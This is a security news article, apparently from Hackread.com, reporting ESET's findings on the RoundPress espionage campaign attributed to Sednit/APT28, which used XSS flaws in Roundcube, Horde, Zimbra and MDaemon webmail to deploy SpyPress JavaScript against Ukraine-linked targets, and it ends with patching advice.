Russia-Linked SpyPress Malware Exploits Webmails to Spy on Ukraine

ESET reports on RoundPress, a cyber espionage campaign by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations via webmail vulnerabilities and SpyPress malware.

Cybersecurity researchers at ESET have revealed a sophisticated cyber espionage campaign, codenamed RoundPress, assessing with “medium confidence” that it is orchestrated by the Russian-backed Sednit group (aka APT28, Fancy Bear). This operation is actively targeting organizations linked with the ongoing conflict in Ukraine, aiming to exfiltrate confidential data from vulnerable webmail servers like RoundCube.

The Sednit group, linked by the US Department of Justice to the 2016 Democratic National Committee (DNC) hack and tracked by Hackread.com in attacks on TV5Monde and WADA, has been employing targeted spearphishing emails in the RoundPress campaign.

These emails exploit Cross-Site Scripting (XSS) vulnerabilities in various webmail platforms to inject malicious JavaScript code, dubbed SpyPress, into the victim’s browser.

In ESET’s blog post, shared with Hackread.com, researchers noted that over the past two years, espionage groups have targeted webmail servers like Roundcube and Zimbra for email theft due to their outdated nature and remote vulnerability triggers making targeting easier.

In 2023, researchers observed Sednit exploiting CVE-2020-35730 in Roundcube. However, in 2024, the campaign expanded to target vulnerabilities in:

• Horde (an older XSS flaw)

• Roundcube (CVE-2023-43770, patched on September 14, 2023)

• Zimbra (CVE-2024-27443, also known as ZBUG-3730, patched on March 1, 2024)

• MDaemon (CVE-2024-11182, a zero-day reported by researchers on November 1, 2024, and patched in version 24.5.1 on November 14, 2024)

ESET noted a specific spearphishing email sent on September 29, 2023, from katecohen1984@portugalmailpt exploiting CVE‑2023‑43770 in Roundcube. The emails often mimic news content to entice victims to open them, such as an email to a Ukrainian target on September 11, 2024, from kyivinfo24@ukrnet about an alleged arrest in Kharkiv, and another to a Bulgarian target on November 8, 2024, from office@terembgcom regarding Putin and Trump.

The primary targets of Operation RoundPress in 2024, as identified through ESET telemetry and VirusTotal submissions, are predominantly Ukrainian governmental entities and defence companies in Bulgaria and Romania, some of which are producing Soviet-era weapons for Ukraine.

Researchers also observed targeting of national governments in Greece, Cameroon, Ecuador, Serbia, and Cyprus (an academic in environmental studies), a telecommunications firm for the defence sector in Bulgaria and a civil air transport company and transportation state company in Ukraine.

The SpyPress malware variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) share obfuscation techniques and communicate with C2 servers via HTTP POST requests. However, their capabilities vary.

For instance, SpyPress.ROUNDCUBE has been observed creating Sieve rules to forward all incoming emails to an attacker-controlled address, such as srezoska@skiffcom (Skiff being a privacy-oriented email service). SpyPress.MDAEMON demonstrated the ability to create App Passwords, granting persistent access.

Researchers concluded that the ongoing exploitation of webmail vulnerabilities by groups like Sednit underscores the importance of timely patching and strong security measures to protect sensitive information from such targeted spying campaigns.

J Stephen Kowski, Field CTO at SlashNext Email Security+ commented on the latest development, stating, “Attacks like Operation RoundPress show how quickly hackers can shift targets, especially when they find weaknesses in popular email platforms.“

“Whether you’re using paid commercial email systems or free, self-hosted open-source options like RoundCube, no solution is completely safe – self-hosted systems often give a false sense of security since they still need regular updates and expert maintenance,“ he warned.

“The best way to stay ahead is by making sure email systems are always updated and patched, using strong protections like multi-factor authentication, and having tools that can spot and block phishing emails before they reach users,” Kowski advised.